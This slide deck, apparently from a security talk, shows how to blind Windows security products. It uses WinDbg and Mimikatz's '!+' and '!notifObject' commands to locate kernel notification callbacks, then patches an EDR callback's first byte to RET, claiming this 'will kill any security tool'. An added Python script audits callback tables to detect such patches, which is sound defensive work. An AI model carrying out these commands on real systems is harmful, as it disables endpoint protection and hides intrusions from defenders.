Killing any security product … using a Mimikatz undocumented feature
2. How to write a security product for Windows?
“There is only one way to do it”
… since Windows Vista
3. How to write a security product for Windows?
ObRegisterCallbacks
PsSetCreateProcessNotifyRoutine (process)
PsSetCreateProcessNotifyRoutineEx
PsSetCreateThreadNotifyRoutine (thread)
PsSetCreateThreadNotifyRoutineEx
PsSetLoadImageNotifyRoutine
CmRegisterCallback (registry)
CmRegisterCallbackEx
FltRegisterFilter (file)
FltStartFiltering
4. Finding process callbacks with WinDbg
kd> dd nt!PspCreateProcessNotifyRoutineCount l1
fffff800`02a821a4 00000005
kd> dd nt!PspCreateProcessNotifyRoutineExCount l1
fffff800`02a821a0 00000002
kd> dp nt!PspCreateProcessNotifyRoutine l8
fffff800`02a81fa0 fffff8a0`00008d6f fffff8a0`001b79ff
fffff800`02a81fb0 fffff8a0`002e784f fffff8a0`002e7bff
fffff800`02a81fc0 fffff8a0`003f295f fffff8a0`001dc53f
fffff800`02a81fd0 fffff8a0`031ef24f 00000000`00000000
5. Other callbacks
kd> dd nt!PspCreatethreadNotifyRoutineCount l1 <<< Thread
fffff800`02a81f80 00000000
kd> dd nt!PspLoadImageNotifyRoutineCount l1 <<< Image load
fffff800`02a81d60 00000002
kd> dp nt!PspLoadImageNotifyRoutine l3
fffff800`02a81d20 fffff8a0`000927ef fffff8a0`002a23cf
fffff800`02a81d30 00000000`00000000
kd> dd nt!CmpCallBackCount l1 <<< Registry
fffff800`02a63b04 00000001
kd> x nt!CallbackListHead
fffff800`02ad8970 nt!CallbackListHead = <no type information>
7. Magic command #1
mimikatz # !+
[*] mimikatz driver not present
[+] mimikatz driver successfully registered
[+] mimikatz driver ACL to everyone
[+] mimikatz driver started
8. Magic command #2
mimikatz # !notifObject
...
* Process
* Callback [type 3]
PreOperation : 0xFFFFF880035B66E0 [ehdrv.sys + 0x0001c6e0]
Open - 0xFFFFF80002D9D300 [ntoskrnl.exe + 0x00348300]
Close - 0xFFFFF80002D83010 [ntoskrnl.exe + 0x0032e010]
Delete - 0xFFFFF80002D822C0 [ntoskrnl.exe + 0x0032d2c0]
Security - 0xFFFFF80002DB52A0 [ntoskrnl.exe + 0x003602a0]
...
9. Back in WinDbg
kd> e ehdrv+0x0001c6e0 c3
0xC3 == RET opcode
After this patch, the notification callback will do nothing
Unlinking from the callbacks list is also doable
● Requires more work ...
● … but is less detectable (no code alteration)
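From the defender's side, the patch shown above (first byte of a registered callback overwritten with 0xC3) is detectable by auditing the callback table: every entry should land inside a loaded module image at the offset the tooling reports, and its first byte should not be a bare RET. The script below is an added example, not part of the original deck or of Mimikatz; it parses `!notifObject`-style lines and runs those checks against a constructed memory snapshot and module list (all addresses, module bases and sizes here are made up for the example).

```python
import re
from typing import Dict, List, Tuple

# Constructed !notifObject-style dump: one patched entry, one clean kernel
# entry, one entry pointing into a module that is not in the loaded list.
CALLBACK_DUMP = """
PreOperation : 0xFFFFF880035B66E0 [ehdrv.sys + 0x0001c6e0]
Open - 0xFFFFF80002D9D300 [ntoskrnl.exe + 0x00348300]
Close - 0xFFFFF88001234560 [notloaded.sys + 0x00004560]
"""

# Constructed loaded-module list: name -> (image base, image size).
MODULES: Dict[str, Tuple[int, int]] = {
    "ehdrv.sys": (0xFFFFF8800359A000, 0x40000),
    "ntoskrnl.exe": (0xFFFFF80002A55000, 0x600000),
}

# Constructed memory snapshot: callback address -> first bytes at that address.
MEMORY: Dict[int, bytes] = {
    0xFFFFF880035B66E0: b"\xC3\x48\x89\x5C",          # patched: RET first
    0xFFFFF80002D9D300: b"\x48\x89\x5C\x24\x08",      # normal x64 prologue
}

LINE_RE = re.compile(
    r"^\s*(\w+)\s*[:-]\s*0x([0-9A-Fa-f]+)\s*\[(\S+)\s*\+\s*0x([0-9A-Fa-f]+)\]")

def parse_callbacks(dump: str) -> List[Tuple[str, int, str, int]]:
    """Return (name, address, module, offset) for each callback line."""
    found = []
    for line in dump.splitlines():
        m = LINE_RE.match(line)
        if m:
            found.append((m.group(1), int(m.group(2), 16),
                          m.group(3), int(m.group(4), 16)))
    return found

def audit_callbacks(dump: str, memory: Dict[int, bytes],
                    modules: Dict[str, Tuple[int, int]]) -> List[Tuple[str, int, str]]:
    """Flag callbacks that are unbacked, mis-attributed, or neutralised with RET."""
    findings = []
    for name, addr, mod, off in parse_callbacks(dump):
        base, size = modules.get(mod, (None, None))
        if base is None or not (base <= addr < base + size):
            findings.append((name, addr, "address not inside a loaded module image"))
            continue
        if addr - base != off:
            findings.append((name, addr, "reported offset does not match module base"))
        if memory.get(addr, b"")[:1] == b"\xC3":
            findings.append((name, addr, "first instruction is RET: callback neutralised"))
    return findings

def run_example() -> List[Tuple[str, int, str]]:
    return audit_callbacks(CALLBACK_DUMP, MEMORY, MODULES)
```

On a live system the same checks would be fed from a kernel debugger or a driver reading the callback tables; the parser and rules are the part that stays the same.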
10. Conclusion
Cons
● You need kernel write access
○ Being able to write a single NULL byte is enough, though
Pros
● Will kill any security tool
● The software will still be “active and running” from a monitoring point of view - just not being notified